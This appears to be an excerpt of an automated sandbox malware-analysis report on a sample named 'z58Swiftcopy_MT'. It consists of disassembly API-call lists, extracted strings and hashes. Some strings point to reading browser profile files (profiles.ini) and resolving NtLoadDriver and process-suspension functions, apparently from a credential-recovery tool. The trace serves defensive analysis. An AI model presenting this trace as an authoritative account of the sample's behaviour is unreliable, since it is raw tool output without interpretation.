                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                                                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
